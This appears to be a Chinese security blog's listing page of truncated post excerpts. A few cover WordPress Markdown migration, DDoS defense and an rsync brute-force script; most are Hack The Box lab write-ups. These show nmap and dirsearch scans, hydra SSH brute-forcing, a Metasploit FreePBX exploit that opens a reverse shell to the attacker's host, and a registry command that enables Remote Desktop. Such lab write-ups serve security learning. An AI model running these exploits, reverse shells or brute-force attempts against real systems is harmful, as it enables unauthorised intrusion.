从语雀迁移的技术文章。
如何在WordPress里完美支持语雀导出的Markdown(支持图片)
语雀导出设置 WordPress设置 使用markdown插件 插件的名字叫:Editor.md 插件的高亮效果如下图所示 改header.php 在这里需要注意: 否则会出现在html中通过img标签引入的图片会报403。但是这个图片地址直接复制出来在地址栏打开,却是看得到的。这就是referer来源地址的问题 ...
从语雀迁移的技术文章。
语雀导出设置 WordPress设置 使用markdown插件 插件的名字叫:Editor.md 插件的高亮效果如下图所示 改header.php 在这里需要注意: 否则会出现在html中通过img标签引入的图片会报403。但是这个图片地址直接复制出来在地址栏打开,却是看得到的。这就是referer来源地址的问题 ...
某次渗透中遇到了rsync,是带密码的,虽然已经有爆破脚本了(例如cdxy前辈在POC-T框架中写的这一个),但前辈的脚本是py2的, 于是想着改写成py3,没想到还顺便分析了一下rsync的认证方式。下面就简单记录一下 ...
本文已参与阿里云先知社区的投稿。原创内容,转载请注明出处。 前言 一个平平无奇的周末,哥们儿发来消息,说自己手上有个产品安全测试搞不定,想让我帮帮忙——本来是不乐意的,但海底捞实在是香,所以有了这次受委托的产品安全测试。 ...
每季度一次的“专项学习”,选择了老生常谈的主题:DDoS,希望可以给各位带来一些启发。 为避免各位看官太长不看,我直接上结论: DDoS攻击的防护,是一项系统工程,没有一种方法绝对有效,是为No silver bullet。简单来说,系统架构、基础设施流量、业务逻辑、灾难预案等方面,在防DDoS方面均要下功夫。可参考本文的遇到DoS时怎么办部分 攻击趋势 常见的DDoS:SYN大包攻击(核心原理:资源耗尽)、TCP/UDP反射型(核心原理:源IP伪造) 游戏仍然是DDoS攻击最集中的行业,占整体分布的39%,另外直播、电商等行业也成为DDoS攻击的新目标 **已备案的正规业务,如果被DDoS的流量在100G以上,可以报案。**可参考本文的4 反制溯源部分 一、DDoS是什么 DDOS(Distributed Denial of Service),又称分布式拒绝服务攻击。骇客通过控制多个肉鸡或服务器组成的僵尸网络,对目标发送大量看似合法请求,从而占用大量网络资源,瘫痪网络,阻止用户对网络资源的正常访问。 ...
Entry point nmap $ nmap -p- -sC -sV -Pn 10.10.10.56 -oA allport Nmap scan report for 10.10.10.56 Host is up (0.0037s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel hydra to brute SSH using fastrack.txt, nothing to gain. /cgi-bin/ using binwalk and file, got nothing special dir searching python3 dirsearch.py -u http://10.10.10.56/ -e * _|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| ) Extensions: | HTTP method: getSuffixes: CHANGELOG.md | HTTP method: get | Threads: 10 | Wordlist size: 6564 | Request count: 6564 Error Log: /opt/dirsearch/logs/errors-20-07-07_23-26-11.log Target: http://10.10.10.56/ Output File: /opt/dirsearch/reports/10.10.10.56/20-07-07_23-26-16 [23:26:16] Starting: [23:28:27] 403 - 299B - /.htaccess-dev [23:28:27] 403 - 301B - /.htaccess-local [23:28:27] 403 - 301B - /.htaccess-marco [23:28:28] 403 - 298B - /.htaccessBAK [23:28:28] 403 - 299B - /.htaccess.txt [23:28:28] 403 - 302B - /.htaccess.sample [23:28:28] 403 - 299B - /.htaccess.old [23:28:28] 403 - 300B - /.htaccess.orig [23:28:28] 403 - 300B - /.htaccess.save [23:28:28] 403 - 300B - /.htaccess.bak1 [23:28:28] 403 - 298B - /.htaccessOLD [23:28:28] 403 - 299B - /.htaccessOLD2 [23:28:28] 403 - 299B - /.htpasswd-old [23:28:28] 403 - 297B - /.httr-oauth [23:34:58] 403 - 294B - /cgi-bin/ after obtaining these, no progress. ...
10.10.10.100 Nmap # nmap -p- -sC -sV -oA allport.nmap 10.10.10.100 Nmap scan report for 10.10.10.100 Host is up (0.0036s latency). Not shown: 65512 closed ports PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-27 14:12:30Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open tcpwrapped 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5722/tcp open msrpc Microsoft Windows RPC 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49169/tcp open msrpc Microsoft Windows RPC 49171/tcp open msrpc Microsoft Windows RPC 49180/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Host script results: |_clock-skew: 2m57s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-06-27T14:13:29 |_ start_date: 2020-06-27T12:57:05 用enum4linux工具扫描,发现smb服务是开着的,且有开放的共享目录 ...
Nmap # nmap -p- -sV -sC 10.10.10.91 -oA scans/nmap Nmap scan report for 10.10.10.91 Host is up (0.90s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 42:90:e3:35:31:8d:8b:86:17:2a:fb:38:90:da:c4:95 (RSA) | 256 b7:b6:dc:c4:4c:87:9b:75:2a:00:89:83:ed:b2:80:31 (ECDSA) |_ 256 d5:2f:19:53:b2:8e:3a:4b:b3:dd:3c:1f:c0:37:0d:00 (ED25519) 5000/tcp open http Gunicorn 19.7.1 |_http-server-header: gunicorn/19.7.1 |_http-title: Site doesn't have a title (text/html; charset=utf-8). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel hydra试着用kali自带的fasttrack字典爆破ssh,无果 ...
弄明白你打的网站,是什么cms,跑的什么中间件,靶机风评如何,很有必要! 10.10.10.60 Nmap # nmap -p- -sC -sV 10.10.10.60 nmap scan report for 10.10.10.60 Host is up (0.0058s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 80/tcp open http lighttpd 1.4.35 |_http-server-header: lighttpd/1.4.35 |_http-title: Did not follow redirect to https://10.10.10.60/ |_https-redirect: ERROR: Script execution failed (use -d to debug) 443/tcp open ssl/https? |_ssl-date: TLS randomness does not represent time lighttpd 1.4.35 80端口会跳转到443,443端口是这个web ...
elastix msf5 exploit(unix/http/freepbx_callmenum) > show options Module options (exploit/unix/http/freepbx_callmenum): Name Current Setting Required Description ---- --------------- -------- ----------- EXTENSION 230-240 yes A range of Local extension numbers Proxies http:127.0.0.1:8080 no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.7 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 443 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host Payload options (cmd/unix/reverse): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.10.16.122 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target msf5 exploit(unix/http/freepbx_callmenum) > run [*] Started reverse TCP double handler on 10.10.16.122:4444 [*] 10.10.10.7:443 - Sending evil request with range 230 [*] 10.10.10.7:443 - Sending evil request with range 231 [*] 10.10.10.7:443 - Sending evil request with range 232 [*] 10.10.10.7:443 - Sending evil request with range 233 [*] 10.10.10.7:443 - Sending evil request with range 234 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo qaF1oILSz5kNCclV; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "qaF1oILSz5kNCclV\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (10.10.16.122:4444 -> 10.10.10.7:39534) at 2020-05-25 01:37:26 +0800 issue to fix set ssl true ...
信息收集 Nmap Nmap scan report for 10.10.10.4 Host is up (0.0050s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Host script results: |_clock-skew: mean: 5d00h30m01s, deviation: 2h07m16s, median: 4d23h00m01s |_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:b1:37 (VMware) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | OS CPE: cpe:/o:microsoft:windows_xp::- | Computer name: legacy | NetBIOS computer name: LEGACY\x00 | Workgroup: HTB\x00 |_ System time: 2020-05-23T20:26:09+03:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f ...